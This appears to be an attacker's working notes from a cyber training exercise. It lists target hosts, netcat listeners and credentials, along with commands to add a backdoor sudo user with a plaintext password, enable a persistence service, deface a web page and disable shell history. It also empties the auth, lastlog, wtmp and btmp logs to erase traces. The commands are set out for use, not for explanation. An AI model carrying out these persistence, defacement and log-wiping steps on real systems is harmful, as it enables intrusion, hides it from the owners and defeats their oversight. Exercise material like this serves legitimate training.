useradd defcender
echo "defcender:password" | chpasswd
usermod defcender -aG sudo
usermod defcender -s /bin/bash
mkhomedir_helper defcender
cat /etc/passwd

Class 25-003 CyBOLC
Windows box: 10.50.X.X
Debian cvte: 10.50.X.X
Attacker: 10.50.X.X
WAN RTR: 10.50.X.X

Linux: 172.24.18.99 Pop the *Dam *Accounts no binary changes do not touch this box after initial dam pop

Host: 172.24.17.4 / .1 *Accounts on both routers
Web: 172.24.10.150 / .180 *Dam + nc -lvnp 3180
DH: 172.24.19.19 / 24.19 *Dam *Accounts + nc -lvnp 3019
DH2: 172.24.18.68 / 19.68 *Dam *Accounts+ nc -lvnp 3068 
DH3: 172.24.18.44 / 19.44 *Dam *Accounts I broke their binaries on this box
WinDH: 172.24.18.82 / 19.82 * viper:viper_1234 /cobrakai:sweepwiththeleg

export HISTSIZE=0
unset HISTFILE

#Web defacement
#on the 180

cp /var/www/html/_pgbackup/index_155777666.html /var/www/html/index.html

#file paths
img/Mountains2.jpg
img/Baku2.jpg
img/augusta_2.jpeg

# Start and enable the service for the dam
sudo systemctl start pop
sudo systemctl enable pop


cat /dev/null > /var/log/auth.log
cat /dev/null > /var/log/lastlog
cat /dev/null > /var/log/wtmp
cat /dev/null > /var/log/btmp

/var/lib/vpd/vpd.drift
/var/lib/vpd/vpd.mrift

/var/www/html/_pgbackup
index_155777666.html



